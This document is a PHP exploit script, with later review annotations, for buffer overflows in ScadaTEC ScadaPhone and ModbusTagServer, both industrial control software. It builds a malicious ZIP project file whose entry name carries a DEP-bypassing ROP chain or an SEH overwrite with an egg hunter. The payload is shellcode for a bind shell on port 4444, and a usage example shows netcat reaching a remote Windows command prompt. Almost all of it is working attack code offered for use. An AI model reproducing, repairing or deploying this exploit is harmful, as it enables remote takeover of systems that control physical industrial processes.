
ScadaTEC ModbusTagServer / ScadaPhone Buffer Overflow

Posted on 12 September 2011

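<?php
/*
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ScadaTEC ModbusTagServer & ScadaPhone (.zip) buffer overflow exploit (0day)

 Date: 09/09/2011
 Author: mr_me (@net__ninja)
 Vendor: http://www.scadatec.com/
 ScadaPhone Version: <= 5.3.11.1230
 ModbusTagServer Version: <= 4.1.1.81
 Tested on: Windows XP SP3 NX=AlwaysOn/OptIn
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Notes:
 - The ScadaPhone exploit is a DEP bypass under windows XP sp3 only
 - The ModbusTagServer exploit does not bypass dep
 - To trigger this vulnerability, you must 'load' a project from a zip file.

 Feel free to improve it if you want.

 Example usage:

 [mr_me@neptune scadatec]$ php zip.php -t scadaphone
 [mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
 Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\ScadaTEC\ScadaPhone\Projects>

 [mr_me@neptune scadatec]$ php zip.php -t modbustagserver
 [mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
 Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\ScadaTEC\ModbusTagServer\Projects>
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 'The reason they call it the American Dream is because you have to be
 asleep to believe it.' ~ George Carlin

 Review notes (not part of the original listing):
 - The published copy had the backslash stripped from every "\x.." escape,
   so the script emitted literal ASCII ("x50x4b...") instead of bytes and
   the output was not a ZIP container at all. The escapes are restored.
 - ereg() was removed in PHP 7; argument parsing now uses preg_match() with
   the same patterns and capture groups.
 - Every address in the ROP chain and SEH record is hard-coded for the
   builds/OS listed above; on anything else the target merely crashes.
 - The shellcode is an opaque byte blob described only by the author's
   comment ("bind shell on port 4444"); nothing here verifies it. Generate
   and open the resulting file only on an isolated lab host.
*/

/**
 * Minimal argv parser.
 *
 * Produces a map where:
 *   "--key=value"           -> ["key" => "value"]
 *   "-x" (one letter flag)  -> ["x" => "true"]   (flags take no value; the
 *                              word that follows, e.g. the software name
 *                              after -t, lands in "input" instead)
 *   anything else           -> appended to ["input"][]
 *
 * Because $argv[0] is the script name, it is always "input"[0] and the
 * first positional word is "input"[1].
 *
 * @param string[] $argv
 * @return array<string, mixed>
 */
function setArgs($argv)
{
    $parsed = array();
    foreach ($argv as $arg) {
        // preg_match() replaces the ereg() calls of the original (removed in
        // PHP 7). /s keeps "." matching newlines the way ereg's "." did.
        if (preg_match('/--([^=]+)=(.*)/s', $arg, $m)) {
            $parsed[$m[1]] = $m[2];
        } elseif (preg_match('/^-([a-zA-Z0-9])/', $arg, $m)) {
            $parsed[$m[1]] = "true";
        } else {
            $parsed["input"][] = $arg;
        }
    }
    return $parsed;
}

/**
 * Builds the malicious ZIP entry name for ScadaPhone (DEP bypass via ROP).
 *
 * Layout by byte offset:
 *     0  57 x "A"
 *    57  ROP chain (27 dwords, 108 bytes)
 *   165  NOP padding up to offset 277
 *   277  "\xeb\x06HI"  jmp short +6: from 279 over the next dword to 285
 *   281  pivot gadget (author's comment: add esp 418; retn)
 *   285  shellcode
 *    .. "A" padding up to $offset, then the 4-byte tail
 *
 * All addresses are for the ScadaPhone build and OS listed in the header.
 *
 * @param string $sc     raw shellcode bytes
 * @param int    $offset length of the name before the 4-byte tail (4064)
 * @return string binary name, $offset + 4 bytes long
 */
function buildScadaPhoneName($sc, $offset)
{
    $pivot = "\x0b\x33\xc6\x01";   // add esp 418; retn
    $jmp   = "\xeb\x06HI";         // jmp short +6; "HI" is never executed

    $rop = "";
    $rop .= "\x1c\x05\x03\x10";    // xor edx,edx; retn
    $rop .= "\xa2\xce\x02\x10";    // pop eax; retn
    $rop .= "\xf4\x11\x6e\x6d";    // &VirtualProtect
    $rop .= "\xa9\x4e\x01\x10";    // mov eax,[eax]; retn
    $rop .= "\xd7\xbf\x01\x10";    // push eax; mov eax,[edx*4+10036948]; and eax,esi; pop esi; pop ebx; retn
    $rop .= "\xc0\xff\xff\xff";    // special sauce: consumed by the "pop ebx" of the gadget above
    $rop .= "\x1e\xe0\x02\x10";    // add edx,ebx; pop ebx; retn 10
    $rop .= "LOLZ";                // junk
    $rop .= "\xea\x37\xc6\x01";    // neg edx; neg eax; sbb edx,0; pop ebx; retn 10
    $rop .= "CAFEBABE";            // junk
    $rop .= "CAFEBABE";            // junk
    $rop .= "\xbf\x52\xc6\x01";    // .data writable
    $rop .= "\xa2\xce\x02\x10";    // pop eax; retn
    $rop .= "CAFEBABE";            // junk
    $rop .= "CAFEBABE";            // junk
    $rop .= "\x17\x32\xc6\x01";    // ptr to 0x400
    $rop .= "\xa9\x4e\x01\x10";    // mov eax,[eax]; retn
    $rop .= "\xe4\x85\x02\x10";    // xchg eax,ebx; add dl,[eax]; mov [eax+8],11; mov eax,13; retn
    $rop .= "\xa2\xce\x02\x10";    // pop eax; retn
    $rop .= "\x90\x90\x90\x90";    // nops
    $rop .= "\x53\x54\x10\x10";    // pop edi; retn
    $rop .= "\x54\x54\x10\x10";    // retn
    $rop .= "\x01\xec\x02\x10";    // pop ecx; retn
    $rop .= "\xc0\x52\xc6\x01";    // .data writable
    $rop .= "\x03\xc0\x17\x10";    // pop ebp; retn
    $rop .= "\x44\xcb\x2b\x10";    // ptr to 'push esp; ret'
    $rop .= "\xb7\xc9\x27\x10";    // pushad; retn

    // strlen() is byte-wise in PHP, which is exactly what binary padding needs.
    $name  = str_repeat("\x41", 57) . $rop;
    $name .= str_repeat("\x90", 277 - strlen($name)) . $jmp . $pivot . $sc;
    // Tail bytes (0x1e, "txt") kept exactly as published; the total length
    // must stay $offset + 4 to match the name length stored in the central
    // directory header.
    $name .= str_repeat("\x41", $offset - strlen($name)) . "\x1e\x74\x78\x74";
    return $name;
}

/**
 * Builds the malicious ZIP entry name for ModbusTagServer (SEH overwrite,
 * no DEP bypass).
 *
 * Layout by byte offset:
 *     0  229 x "A"
 *   229  32-byte egg hunter, padded with "D" to 48 bytes
 *   277  nSEH "\xeb\xceHI"  jmp short -50: from 279 back to the hunter at 229
 *   281  SEH handler (author's comment: pop esi; pop ebx; retn)
 *   285  100 x "D", the egg "OMFGOMFG", then the shellcode
 *    .. "A" padding up to $offset, then the 4-byte tail
 *
 * All addresses are for the ModbusTagServer build and OS listed in the header.
 *
 * @param string $sc     raw shellcode bytes
 * @param int    $offset length of the name before the 4-byte tail (4064)
 * @return string binary name, $offset + 4 bytes long
 */
function buildModbusTagServerName($sc, $offset)
{
    // Looks like the standard 32-byte Windows egg hunter (int 0x2e probe,
    // scasd twice on the tag) keyed to "OMFG"; the tag is placed twice
    // directly in front of the shellcode below. Not verified here.
    $hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a" .
              "\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
              "OMFG" .
              "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
    $nseh = "\xeb\xceHI";          // jmp short -50 (0xce); "HI" is never executed
    $seh  = "\xac\x14\x40\x00";    // pop esi; pop ebx; retn

    $name  = str_repeat("\x41", 229) . $hunter . str_repeat("\x44", 48 - strlen($hunter)) .
             $nseh . $seh . str_repeat("\x44", 100) . "OMFGOMFG" . $sc;
    // Tail bytes (0x1e, "txt") kept exactly as published; see buildScadaPhoneName().
    $name .= str_repeat("\x41", $offset - strlen($name)) . "\x1e\x74\x78\x74";
    return $name;
}

if ($argc < 3) {
    echo "\n" .
         "-----------------------------------------------------------------------------\n" .
         "Usage: php " . $argv[0] . " -t <software>\n\n" .
         "software: target software\n\n" .
         "Example:\n" .
         "php " . $argv[0] . " -t scadaphone\n" .
         "php " . $argv[0] . " -t modbustagserver\n" .
         "-----------------------------------------------------------------------------\n";
    exit(1);   // non-zero so a calling shell can tell "usage" from success
}

$myArgs = setArgs($argv);
// "-t" itself is recorded as a flag; the software name is the first positional word.
$target = isset($myArgs["input"][1]) ? $myArgs["input"][1] : "";

// ZIP container with a single stored entry whose *name* is the 4068-byte
// payload and whose data is empty (sizes are 0 in the central directory).
//
// Local file header, 30 bytes.
// NOTE(review): counting the bytes, the 0xe4 0x0f pair sits at offset 26
// here, one byte earlier than the central directory header puts it (where
// the name-length field starts at offset 28 of a CDFH / 26 is still inside
// the uncompressed-size field of an LFH). Either the published copy lost a
// byte or the target only honours the central directory. Left exactly as
// published - verify against the original before relying on it.
$lf_header = "\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00" .
             "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";

// Central directory file header, 46 bytes: crc/sizes 0, name length
// 0x0fe4 (4068), no extra/comment, internal attrs 0x0001, external attrs
// 0x24, local header at offset 0.
$cdf_header = "\x50\x4b\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00" .
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00" .
              "\x24\x00\x00\x00\x00\x00\x00\x00";

// End of central directory, 22 bytes: one entry, directory size 0x1012
// (46 + 4068) starting at 0x1002 (30 + 4068), no comment.
$efcdr_record = "\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" .
                "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";

// Name length before the 4-byte tail: 4064 + 4 = 4068 = 0x0fe4, the name
// length written into the central directory header above.
$offset = 4064;

// bind shell on port 4444 (author's description; opaque bytes, not verified)
$sc = "\x90\x90\x90\x90" .
      "\xd9\xc7\xb8\x94\x32\x09\x43\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" .
      "\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x80\xd0\xfc\xbf\x40\x9d" .
      "\xff\x3f\x90\xfe\x76\xda\xa1\x2c\xec\xae\x93\xe0\x66\xe2\x1f" .
      "\x8a\x2b\x17\x94\xfe\xe3\x18\x1d\xb4\xd5\x17\x9e\x78\xda\xf4" .
      "\x5c\x1a\xa6\x06\xb0\xfc\x97\xc8\xc5\xfd\xd0\x35\x25\xaf\x89" .
      "\x32\x97\x40\xbd\x07\x2b\x60\x11\x0c\x13\x1a\x14\xd3\xe7\x90" .
      "\x17\x04\x57\xae\x50\xbc\xdc\xe8\x40\xbd\x31\xeb\xbd\xf4\x3e" .
      "\xd8\x36\x07\x96\x10\xb6\x39\xd6\xff\x89\xf5\xdb\xfe\xce\x32" .
      "\x03\x75\x25\x41\xbe\x8e\xfe\x3b\x64\x1a\xe3\x9c\xef\xbc\xc7" .
      "\x1d\x3c\x5a\x83\x12\x89\x28\xcb\x36\x0c\xfc\x67\x42\x85\x03" .
      "\xa8\xc2\xdd\x27\x6c\x8e\x86\x46\x35\x6a\x69\x76\x25\xd2\xd6" .
      "\xd2\x2d\xf1\x03\x64\x6c\x9e\xe0\x5b\x8f\x5e\x6e\xeb\xfc\x6c" .
      "\x31\x47\x6b\xdd\xba\x41\x6c\x22\x91\x36\xe2\xdd\x19\x47\x2a" .
      "\x1a\x4d\x17\x44\x8b\xed\xfc\x94\x34\x38\x52\xc5\x9a\x92\x13" .
      "\xb5\x5a\x42\xfc\xdf\x54\xbd\x1c\xe0\xbe\xc8\x1a\x2e\x9a\x99" .
      "\xcc\x53\x1c\x0c\x51\xdd\xfa\x44\x79\x8b\x55\xf0\xbb\xe8\x6d" .
      "\x67\xc3\xda\xc1\x30\x53\x52\x0c\x86\x5c\x63\x1a\xa5\xf1\xcb" .
      "\xcd\x3d\x1a\xc8\xec\x42\x37\x78\x66\x7b\xd0\xf2\x16\xce\x40" .
      "\x02\x33\xb8\xe1\x91\xd8\x38\x6f\x8a\x76\x6f\x38\x7c\x8f\xe5" .
      "\xd4\x27\x39\x1b\x25\xb1\x02\x9f\xf2\x02\x8c\x1e\x76\x3e\xaa" .
      "\x30\x4e\xbf\xf6\x64\x1e\x96\xa0\xd2\xd8\x40\x03\x8c\xb2\x3f" .
      "\xcd\x58\x42\x0c\xce\x1e\x4b\x59\xb8\xfe\xfa\x34\xfd\x01\x32" .
      "\xd1\x09\x7a\x2e\x41\xf5\x51\xea\x71\xbc\xfb\x5b\x1a\x19\x6e" .
      "\xde\x47\x9a\x45\x1d\x7e\x19\x6f\xde\x85\x01\x1a\xdb\xc2\x85" .
      "\xf7\x91\x5b\x60\xf7\x06\x5b\xa1";

if ($target === "scadaphone") {
    $name = buildScadaPhoneName($sc, $offset);
} elseif ($target === "modbustagserver") {
    $name = buildModbusTagServerName($sc, $offset);
} else {
    // The original exited silently with status 0 here, which made a typo in
    // the target name indistinguishable from success.
    fwrite(STDERR, "Unknown target '" . $target . "'; expected scadaphone or modbustagserver\n");
    exit(1);
}

// The same name is written into both the local header and the central
// directory entry, as a ZIP reader expects.
$zip = $lf_header . $name . $cdf_header . $name . $efcdr_record;
if (file_put_contents("scadatec.zip", $zip) === false) {
    fwrite(STDERR, "Failed to write scadatec.zip\n");
    exit(1);
}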

 
